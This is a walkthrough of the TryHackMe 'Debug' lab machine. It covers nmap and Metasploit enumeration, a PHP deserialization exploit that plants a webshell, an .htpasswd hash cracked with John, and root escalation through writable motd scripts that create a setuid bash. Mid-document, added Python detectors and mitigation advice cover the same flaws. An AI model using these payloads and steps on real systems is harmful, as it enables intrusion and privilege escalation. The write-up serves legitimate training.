hamzairshad02
TryHackMe: Debug - Walkthrough

Machine Link: Debug

Starting off with nmap

┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -v 10.10.69.115
Starting Nmap 7.91 ( https://nmap.org ) at 2023-09-23 08:02 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating Ping Scan at 08:02
Scanning 10.10.69.115 [2 ports]
Completed Ping Scan at 08:02, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:02
Completed Parallel DNS resolution of 1 host. at 08:02, 0.00s elapsed
Initiating Connect Scan at 08:02
Scanning 10.10.69.115 [1000 ports]
Discovered open port 22/tcp on 10.10.69.115
Discovered open port 80/tcp on 10.10.69.115
Connect Scan Timing: About 32.68% done; ETC: 08:03 (0:01:04 remaining)
Increasing send delay for 10.10.69.115 from 0 to 5 due to max_successful_tryno increase to 5
Completed Connect Scan at 08:03, 62.64s elapsed (1000 total ports)
Initiating Service scan at 08:03
Scanning 2 services on 10.10.69.115
Completed Service scan at 08:03, 6.88s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.69.115.
Initiating NSE at 08:03
Completed NSE at 08:03, 19.40s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 1.72s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Nmap scan report for 10.10.69.115
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.42 seconds

We find two open ports: 22 (SSH) and 80 (HTTP). Let's enumerate SSH first, starting from the version banner it exposes, and see whether there is a known exploit for it.


Searching for that version shows it is vulnerable to username enumeration, so let's launch Metasploit and see whether it has a module for it.

msf6 > search port:22 ssh enum

Matching Modules
================

   #  Name                                           Disclosure Date  Rank    Check  Description
   -  ----                                           ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/cerberus_sftp_enumusers  2014-05-27       normal  No     Cerberus FTP Server SFTP Username Enumeration
   1  auxiliary/scanner/ssh/ssh_enumusers                             normal  No     SSH Username Enumeration

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_enumusers                                             

msf6 > use 1
msf6 auxiliary(scanner/ssh/ssh_enumusers) >

The search shows an ssh_enumusers scanner module, so let's use it.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/legion/wordlists/ssh-user.txt
USER_FILE => /usr/share/legion/wordlists/ssh-user.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.10.69.115:22 - SSH - Using malformed packet technique
[*] 10.10.69.115:22 - SSH - Starting scan
[+] 10.10.69.115:22 - SSH - User 'root' found
[!] No active DB -- Credential data will not be saved!
[+] 10.10.69.115:22 - SSH - User 'sysop' found
[+] 10.10.69.115:22 - SSH - User 'admin' found
[+] 10.10.69.115:22 - SSH - User 'admnistrator' found
[+] 10.10.69.115:22 - SSH - User 'superuser' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Using the usual ssh-user.txt wordlist that ships with Kali Linux, the module reports all of these users as present on the machine. Well, that's a little too many.


Checking out port 80 gives the typical Apache2 Ubuntu Default Page.

So we don't have a password for SSH, and the HTTP port is only showing the default page. What else can we do now? Start brute forcing things, right? Let's start with directory busting then.

┌──(kali㉿kali)-[~/dirsearch]
└─$ dirsearch -u http://10.10.69.115/ -t 100   

  _|. _ _  _  _  _ _|_    v0.4.2                                             
 (_||| _) (/_(_|| (_| )                                                      

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 100 | Wordlist size: 10927                                                             

Output File: /home/kali/.dirsearch/reports/10.10.69.115/-_23-09-23_08-39-55.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-09-23_08-39-55.log

Target: http://10.10.69.115/

[08:39:56] Starting: 
[08:40:20] 403 -  277B  - /.htaccess.sample                                
[08:40:20] 403 -  277B  - /.htaccess_sc                                    
[08:40:20] 403 -  277B  - /.htaccessBAK                                    
[08:40:20] 403 -  277B  - /.htaccess.orig
[08:40:20] 403 -  277B  - /.htaccess_orig                                  
[08:40:20] 403 -  277B  - /.htaccess.save
[08:40:20] 403 -  277B  - /.htaccessOLD2                                   
[08:40:20] 403 -  277B  - /.htaccess_extra                                 
[08:40:20] 403 -  277B  - /.htm
[08:40:21] 403 -  277B  - /.htpasswds                                      
[08:40:21] 403 -  277B  - /.html                                           
[08:40:21] 403 -  277B  - /.htaccess.bak1                                  
[08:40:21] 403 -  277B  - /.ht_wsr.txt
[08:40:21] 403 -  277B  - /.htaccessOLD                                    
[08:40:21] 403 -  277B  - /.httr-oauth                                     
[08:40:22] 403 -  277B  - /.htpasswd_test                                  
[08:40:23] 403 -  277B  - /.php                                            
[08:40:24] 403 -  277B  - /.php3                                           
[08:40:57] 301 -  313B  - /backup  ->  http://10.10.69.115/backup/          
[08:40:57] 200 -    2KB - /backup/                                          
[08:41:19] 200 -   11KB - /index.html                                       
[08:41:19] 200 -    6KB - /index.php                                        
[08:41:19] 200 -    6KB - /index.php/login/                                 
[08:41:22] 301 -  317B  - /javascript  ->  http://10.10.69.115/javascript/  
[08:41:43] 200 -    2KB - /readme.md                                        
[08:41:46] 403 -  277B  - /server-status/                                   
[08:41:48] 403 -  277B  - /server-status                                    

Task Completed

Directory busting with dirsearch did come up with some directories. Let's look into the most interesting one, /index.php/login/.


This page brings up a submit form. Throwing XSS and SQL payloads at it doesn't work, so let's dig deeper and look for its code.

Viewing this page's source only gives some unhelpful HTML. Let's find this index.php file somewhere else.

In our directory busting a /backup/ folder was found, so let's see if it holds the index.php file. It does: a backup copy named index.php.bak.

<?php

class FormSubmit {

    public $form_file = 'message.txt';
    public $message = '';

    public function SaveMessage() {

        $NameArea = $_GET['name'];
        $EmailArea = $_GET['email'];
        $TextArea = $_GET['comments'];

        $this->message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

    }

    public function __destruct() {

        file_put_contents(__DIR__ . '/' . $this->form_file, $this->message, FILE_APPEND);
        echo 'Your submission has been successfully saved!';

    }

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application->SaveMessage();

?>

The comment in the code gives the hint, so that must be where we go further from. And as the machine description said, we have to do PHP deserialization, so now is the time.

The PHP code takes the name, email and comment passed via GET by the form on the page. It uses those values to build a message that gets written to the file message.txt when the object is destructed. Let's test it a little first by opening the following URL.

http://debug.thm/index.php?name=test&email=test&comments=test&select=1&checkbox=1

Visiting this URL then confirms our understanding.

http://debug.thm/message.txt


Now the part of the code carrying the comment tells us that if the URL contains a debug parameter, its content is deserialized. That means we can serialize an object of the class FormSubmit with the file name and message we want. The server deserializes it, and when execution reaches the end of the PHP block the object goes out of scope, the class destructor is called, and our message is written to the file of our choice.

So let's build a small script to produce our shell payload.

<?php
class FormSubmit {
    public $form_file = 'test.php';
    public $message = '<?php system($_GET["cmd"]); ?>';
}
$obj = new FormSubmit();
echo serialize($obj);
?>

Running it gives us the serialized object.

└─$ php testing.php
O:10:"FormSubmit":2:{s:9:"form_file";s:8:"test.php";s:7:"message";s:30:"<?php system($_GET["cmd"]); ?>";}

Now let's URL-encode it through CyberChef or any other URL encoder and pass it in the debug parameter.

http://debug.thm/index.php?debug=O%3A10%3A"FormSubmit"%3A2%3A{s%3A9%3A"form_file"%3Bs%3A8%3A"test.php"%3Bs%3A7%3A"message"%3Bs%3A30%3A"<%3Fphp system(%24_GET["cmd"])%3B %3F>"%3B}
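As an added example (not code from the original post), here is a detector a defender could run over Apache access logs to spot requests like the one above: it URL-decodes every query parameter, parses the O:…:{…} structure of a serialized PHP object by the declared lengths, and reports members that name a .php file or contain a PHP open tag. The log lines are constructed to mirror this write-up's requests.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Start of a serialized PHP object, O:<len>:"<Class>":<members>:{ , a
# length-prefixed string member, and the request line of a combined log entry.
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z_][\w\\]*)":(\d+):\{')
PHP_STRING_RE = re.compile(r's:(\d+):"')
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
EXEC_EXTS = (".php", ".phtml", ".phar")

# Constructed Apache log lines (not from the original post); line 1 carries the
# URL-encoded FormSubmit object the write-up sends in the debug parameter.
SAMPLE_LOG = """\
10.9.0.5 - - [23/Sep/2023:08:52:11 -0400] "GET /index.php?debug=O%3A10%3A%22FormSubmit%22%3A2%3A%7Bs%3A9%3A%22form_file%22%3Bs%3A8%3A%22test.php%22%3Bs%3A7%3A%22message%22%3Bs%3A30%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%22%3B%7D HTTP/1.1" 200 42 "-" "curl/7.88"
10.9.0.5 - - [23/Sep/2023:08:53:02 -0400] "GET /index.php?name=test&email=test&comments=test HTTP/1.1" 200 42 "-" "curl/7.88"
10.9.0.5 - - [23/Sep/2023:08:53:40 -0400] "GET /test.php?cmd=id HTTP/1.1" 200 61 "-" "curl/7.88"
"""

def parse_members(body, count):
    """Read `count` key/value pairs from an object's member list. Strings are
    taken by their declared length (PHP counts bytes; fine for ASCII), so the
    quotes and ';' inside the webshell value cannot confuse the parser. Stops
    at the first non-string member (int, bool, null, array, nested object)."""
    items, pos = [], 0
    while len(items) < 2 * count:
        m = PHP_STRING_RE.match(body, pos)
        if not m:
            break
        n = int(m.group(1))
        items.append(body[m.end():m.end() + n])
        pos = m.end() + n + 2                 # skip the closing quote and ';'
    return dict(zip(items[0::2], items[1::2]))

def scan_request_line(log_line):
    """One finding ({param, class, members}) per serialized PHP object found in
    any query parameter of the logged request."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group(1)).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:                  # already URL-decoded by parse_qs
            for om in PHP_OBJECT_RE.finditer(value):
                members = parse_members(value[om.end():], int(om.group(2)))
                findings.append({"param": param, "class": om.group(1),
                                 "members": members})
    return findings

def assess(finding):
    """Why a finding matters: an object reaching unserialize() can invoke a
    magic method such as __destruct, and these members show a script write."""
    reasons = [f"object of class {finding['class']} in parameter "
               f"'{finding['param']}' (user input reaching unserialize())"]
    for key, val in finding["members"].items():
        if isinstance(val, str) and val.lower().endswith(EXEC_EXTS):
            reasons.append(f"member '{key}' names a server-side script: {val}")
        if isinstance(val, str) and "<?php" in val:
            reasons.append(f"member '{key}' carries a PHP open tag")
    return reasons

def scan_log(text):
    """(line number, finding, reasons) for every object-carrying request."""
    return [(n, f, assess(f)) for n, line in enumerate(text.splitlines(), 1)
            for f in scan_request_line(line)]
```

On the server side this class of bug is closed by never feeding user input to unserialize() (a JSON debug parameter would do), or at the very least by calling unserialize($debug, ['allowed_classes' => false]) so no destructor or other magic method of an attacker-chosen class can run.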

Let's visit the test.php file along with a command to see if our payload worked.


And it did. Running ls -al shows a file called .htpasswd.


Looking into the file, we find some very welcome credentials.


The password is stored as a hash, so let's crack it.

└─$ john htpasswd.hash 
Created directory: /home/kali/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 20 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 15 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 23 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 21 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 13 candidates buffered for the current salt, minimum 24 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 14 candidates buffered for the current salt, minimum 24 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
jamaica          (james)
1g 0:00:00:00 DONE 2/3 (2023-09-23 10:57) 11.11g/s 20288p/s 20288c/s 20288C/s francine..me
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Saving the collected hash in a file htpasswd.hash and running it through John the Ripper gives us the password. This means it's SSH time!

┌──(kali㉿kali)-[~]
└─$ ssh james@10.10.69.115                                                            255 ⨯
The authenticity of host '10.10.69.115 (10.10.69.115)' can't be established.
ECDSA key fingerprint is SHA256:JCUiGJ9gC+EZEJeudS9yMKLVlE7MtpS2rolJudHcCbQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.69.115' (ECDSA) to the list of known hosts.
james@10.10.69.115's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

439 packages can be updated.
380 updates are security updates.

Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44
james@osboxes:~$ ls
Desktop    Downloads         Music              Pictures  Templates  Videos
Documents  examples.desktop  Note-To-James.txt  Public    user.txt
james@osboxes:~$ cat user.txt
7e37c84a66cc40b1c6bf700d08d28c20

SSHing into the machine and opening user.txt gives us the first flag. Time to go for root now.

james@osboxes:~$ cat Note-To-James.txt
Dear James,

As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it? 

But there's still one thing I'd like you to do, before the submission.

Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D

I gave you access to modify all these files :) 

Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!

Best Regards,

root

Another file, Note-To-James.txt, is present in the same directory and tells us the next step. According to this note, we should be able to modify the Message Of The Day (motd) scripts.

james@osboxes:~$ ls -l /etc/update-motd.d/
total 28
-rwxrwxr-x 1 root james 1220 Mar 10  2021 00-header
-rwxrwxr-x 1 root james    0 Mar 10  2021 00-header.save
-rwxrwxr-x 1 root james 1157 Jun 14  2016 10-help-text
-rwxrwxr-x 1 root james   97 Dec  7  2018 90-updates-available
-rwxrwxr-x 1 root james  299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x 1 root james  142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x 1 root james  144 Dec  7  2018 98-reboot-required
-rwxrwxr-x 1 root james  604 Nov  5  2017 99-esm

We see that the james group has write rights on every file inside update-motd.d, and these scripts run as root each time someone logs in over SSH. Let's edit the very first one.

#!/bin/sh
cp /bin/bash /tmp/
chmod u+s /tmp/bash
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
        # Fall back to using the very slow lsb_release utility
        DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

I added two lines right beneath the shebang on the first line. Remember to use nano to edit the files since it's the least painful of the command line text editors in existence.

Now just log out and SSH into the machine again so the Message Of The Day (motd) scripts run, and see whether our added commands get us root.

james@osboxes:~$ id
uid=1001(james) gid=1001(james) groups=1001(james)
james@osboxes:~$ /tmp/bash -p
bash-4.3# id
uid=1001(james) gid=1001(james) euid=0(root) groups=1001(james)

Now that we've logged in again and run /tmp/bash -p, we see that our effective uid went from 1001 to 0 real quick. We are root!
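As an added check, not part of the original walkthrough, this script audits the two conditions the escalation above relies on: update-motd.d scripts that a non-root account can edit, and setuid or setgid binaries left in /tmp. demo() builds a constructed copy of that layout under a temporary directory so it runs offline; the real system paths are the defaults.

```python
import os
import stat
import tempfile

MOTD_DIR = "/etc/update-motd.d"   # every script here runs as root at SSH login

def audit_motd_scripts(directory=MOTD_DIR, trusted_uid=0):
    """Return (path, reason) pairs for scripts in `directory` that someone
    other than the trusted owner could edit: wrong owner, or a group- or
    world-writable mode such as the rwxrwxr-x root:james files above."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_uid != trusted_uid:
            findings.append((path, f"owned by uid {st.st_uid}, not {trusted_uid}"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((path, f"group-writable (gid {st.st_gid})"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
    return findings

def find_setuid_files(directory="/tmp"):
    """Return (path, owner uid, mode) for regular files under `directory` that
    carry the setuid or setgid bit. A setuid copy of bash in /tmp is the
    artefact this write-up's escalation leaves behind."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return hits

def demo():
    """Build a constructed copy of the layout from the write-up under a temp
    dir (a group-writable 00-header, a correctly locked 10-help-text and a
    setuid 'bash' in tmp) and run both checks over it. The files are owned by
    the current user, so that uid is passed as the trusted owner here."""
    base = tempfile.mkdtemp(prefix="motd-audit-")
    motd, tmp = os.path.join(base, "update-motd.d"), os.path.join(base, "tmp")
    os.mkdir(motd); os.mkdir(tmp)
    for rel, mode in (("update-motd.d/00-header", 0o775),
                      ("update-motd.d/10-help-text", 0o755),
                      ("tmp/bash", 0o4755)):
        path = os.path.join(base, rel)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return audit_motd_scripts(motd, trusted_uid=os.getuid()), find_setuid_files(tmp)

if __name__ == "__main__":
    motd_findings, suid_hits = demo()
    for path, reason in motd_findings:
        print(f"{path}: {reason}")
    for path, uid, mode in suid_hits:
        print(f"setuid/setgid file {path} (uid {uid}, mode {mode})")
```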

bash-4.3# ls
Desktop  Documents  Downloads  examples.desktop  Music  Note-To-James.txt  Pictures  Public  Templates  user.txt  Videos
bash-4.3# cd ..
bash-4.3# ls
james  lost+found
bash-4.3# ls -al
total 28
drwxr-xr-x  4 root  root   4096 Mar 10  2021 .
drwxr-xr-x 24 root  root   4096 Feb 28  2019 ..
drwx------ 17 james james  4096 Mar 10  2021 james
drwx------  2 root  root  16384 Feb 28  2019 lost+found
bash-4.3# cd ..
bash-4.3# ls
bin  boot  cdrom  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  sys  tmp  usr  var  vmlinuz
bash-4.3# cd root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
3c8c3d0fe758c320d158e32f68fabf4b

Navigating a little more just leads us to the root flag.
